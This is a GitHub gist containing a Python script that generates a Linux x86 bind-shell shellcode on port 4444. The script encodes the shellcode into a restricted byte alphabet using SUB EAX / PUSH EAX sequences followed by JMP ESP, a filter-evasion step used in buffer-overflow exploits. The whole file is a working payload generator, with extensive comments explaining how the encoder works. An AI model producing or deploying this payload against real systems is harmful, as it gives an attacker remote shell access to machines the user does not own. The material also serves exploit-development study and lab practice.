@thesp0nge
Created April 19, 2019 12:33
bind shell shellcode encoded with SUB EAX technique
#!/usr/bin/env python
# Please install shellerate>=0.4.2 before: pip install shellerate
import sys
import string
import logging
import secrets
from shellerate import strings;
from shellerate import asm_x86;
from shellerate.bind_shellcode import BindShellcode;
# The code for find_encoded_sequence and generate_add_eax_sum_shellcode was
# taken from the https://www.kerrymilan.com vulnserver work, with some slight
# changes, and integrated into shellerate
def find_encoded_sequence(dword: int, three: bool = False) -> list[tuple[int, ...]]:
    """Find, for each byte of *dword*, a tuple of allowed bytes that sums to it.

    This is the core of the SUB-EAX encoder: every 32-bit operand is rebuilt as
    the column-wise sum of two (or, when *three* is set, three) values drawn
    from ``allowed``, the restricted alphabet the final payload may contain.

    Args:
        dword: the value to decompose; consumed one byte at a time,
            least-significant byte first (``dword >>= 8``).
        three: search triples instead of pairs (a larger search space; the
            caller uses this as a fallback when pairs fail).

    Returns:
        A list of up to four tuples, one per byte, low byte first. A byte for
        which no combination exists contributes no tuple, so the list may be
        shorter than four; the caller detects that by re-summing the result.
    """
    # Byte values the encoded payload may contain: 0x01-0x09, '1'-'9', ';<=>',
    # and 'A' through '~'. Note the trailing \x7d is a duplicate.
    allowed="\x01\x02\x03\x04\x05\x06\x07\x08\x09\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3b\x3c\x3d\x3e\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7d"
    # Numeric form of the alphabet (the list() call is redundant; str is iterable).
    a_int = [ord(n) for n in list(allowed)]
    matches = []
    # `zero` is never set to anything but False below, so `carry | zero`
    # reduces to `carry`.
    zero = False
    # Carry out of the previous column's sum: 0 on the first pass, a bool
    # afterwards; it is subtracted from the next byte so that adding the
    # operands as whole dwords still reproduces the input.
    carry = 0
    for x in range(0, 4):
        # Target value for this byte position, compensated for the carry
        # produced by the lower column.
        byte = (dword - (carry | zero)) % 256
        found = False
        # Candidate operand tuples; rebuilt on every outer iteration
        # (len(a_int)**2 or len(a_int)**3 entries).
        l = [(f1, f2) for f1 in a_int for f2 in a_int]
        if three:
            l = [(f1, f2, f3) for f1 in a_int for f2 in a_int for f3 in a_int]
        for i in l:
            # First tuple whose byte-sum matches wins; `found` suppresses later
            # hits. The set-difference test is always true, since every element
            # of the tuple was drawn from a_int.
            if not found and (sum(i) % 256) == byte and len(set(i) - set(a_int)) == 0:
                found = True
                # Did this column overflow a byte? (bool, used arithmetically
                # in the next pass.)
                carry = (sum(i) >= 0x100)
                zero = False #(byte == 0xFF)
                matches.append(i)
        dword >>= 8
    return matches
def generate_add_eax_sum_shellcode(result: str) -> str:
    """Encode one 32-bit word as a zero-EAX / SUB-EAX / PUSH-EAX sequence.

    The two's complement of *result* is decomposed by find_encoded_sequence
    into operands from the restricted alphabet; subtracting those operands
    from a zeroed EAX leaves EAX == result (mod 2**32), which is then pushed.

    Args:
        result: the target dword as 8 hex digits, without a 0x prefix.

    Returns:
        The instruction bytes rendered as ``\\x..`` escape text (the
        backslashes are literal characters, so this is a textual
        representation rather than raw bytes), or "" when no operand
        sequence could be found for some byte (an error is logged).
    """
    # Two's-complement negation of the target dword.
    compl_two = int("FFFFFFFF", 16) - int(result, 16) + 1
    c = find_encoded_sequence(compl_two)
    c2_h = "0x{:08x}".format(compl_two)
    # Regroup the per-byte tuples into per-operand dwords: c[::-1] puts the
    # high byte first, zip(*...) transposes bytes -> operands, and each
    # operand is rendered as 8 hex digits.
    f = ["".join(["{:02x}".format(j) for j in list(i)]) for i in zip(*c[::-1])]
    # Re-add the operands (mod 2**32) to verify they reproduce compl_two; a
    # missing byte in `c` shows up here as a mismatch.
    f_sum = "0x{:08x}".format(sum([int(i, 16) for i in f]) % (2**32))
    if (c2_h != f_sum):
        # Fallback: widen the search to three operands per byte.
        logging.warning("can't find a good encoded sequence using 2 operands... trying with 3")
        c = find_encoded_sequence(compl_two, True)
        f = ["".join(["{:02x}".format(j) for j in list(i)]) for i in zip(*c[::-1])]
        f_sum = "0x{:08x}".format(sum([int(i, 16) for i in f]) % (2**32))
        if(c2_h != f_sum):
            logging.error("can't find a good encoded sequence. Please consider changing this shellcode sequence" + result)
            return ""
    # Human-readable trace of the emitted instruction sequence. The two AND
    # masks are logged as literals here; presumably they match what
    # asm_x86.zero_with_and emits -- confirm against shellerate.
    logging.debug("obtaining 0x{0} with this ASM sequence".format(result))
    for i in ("554e4d4a", "2a313235"):
        logging.debug("AND EAX, 0x{0}".format(i))
    for j in f:
        logging.debug("SUB EAX, 0x{0}".format(j))
    logging.debug("PUSH EAX")
    # EAX := 0 using only alphabet-safe AND instructions (shellerate helper).
    shellcode = asm_x86.zero_with_and("eax")
    for i in f:
        # 0x2d = SUB EAX, imm32. The operand is presumably byte-swapped to
        # little-endian and rendered as \x escapes by the shellerate helpers
        # -- inferred from their names, confirm.
        shellcode += "\\x2d" + strings.from_string_to_payload(strings.swap(i))
    # 0x50 = PUSH EAX: place the decoded dword on the stack.
    shellcode+="\\x50"
    return shellcode
def generate_exploit() -> str:
    """Build the encoded bind-shell payload and return it as ``\\x..`` text.

    Pipeline: shellerate generates a Linux x86 bind shellcode listening on
    port 4444; it is padded, converted to a hex string, reversed and split
    into 8-hex-digit words. After a prologue that zeroes EAX and loads ESP
    into it, each word is pushed via generate_add_eax_sum_shellcode, and the
    epilogue jumps to ESP. The result is a long run of SUB EAX / PUSH EAX
    instructions whose immediates come only from the restricted alphabet.

    Returns:
        The payload as text of ``\\x..`` escapes. Words that could not be
        encoded contribute "" (see generate_add_eax_sum_shellcode), so the
        output is not checked for completeness here.
    """
    # Listener port 4444; architecture and OS as shellerate names them.
    b=BindShellcode(4444, 'x86', 'linux')
    b.generate()
    original_shellcode = b.shellcode()
    # Presumably pads to a multiple of 4 bytes so the split below yields whole
    # dwords -- confirm in shellerate.
    padded = strings.pad(original_shellcode)
    o1 = strings.from_char_to_hexcode(padded)
    # Reversed so the words are pushed last-first (the stack grows downwards)
    # -- inferred from the PUSH-based decoder, confirm in shellerate.
    reverse=strings.reverse(o1)
    logging.debug(reverse)
    # 8 hex digits == one 32-bit word.
    words = strings.split(reverse, 8)
    shellcode = ""
    # Prologue (per the helper names): EAX := 0, then EAX := ESP.
    shellcode += asm_x86.zero_eax()
    shellcode += asm_x86.get_esp_address_in_eax()
    # shellcode += "\\x2d\\x66\\x4d\\x55\\x55\\x2d\\x66\\x4b\\x55\\x55\\x2d\\x6a\\x50\\x55\\x55" # get some free space into the stack
    # shellcode += "\\x50\\x5c" #PUSH EAX + POP ESP
    # One zero/SUB/PUSH sequence per dword.
    for w in words:
        logging.debug(w)
        shellcode += generate_add_eax_sum_shellcode(w)
    # ff e4 = JMP ESP: transfer control to the bytes just pushed.
    shellcode += "\\xff\\xe4";
    return shellcode
if __name__ == "__main__":
    # Script entry point: verbose logging to the root logger, then print the
    # encoded payload produced by generate_exploit().
    log_format = '[%(levelname)s] %(asctime)s - %(message)s'
    log_datefmt = '%d/%b/%y %H:%M:%S'
    logging.basicConfig(format=log_format, level=logging.DEBUG, datefmt=log_datefmt)
    logging.debug("GENERATING shellcode")
    sc = generate_exploit()
    print(sc)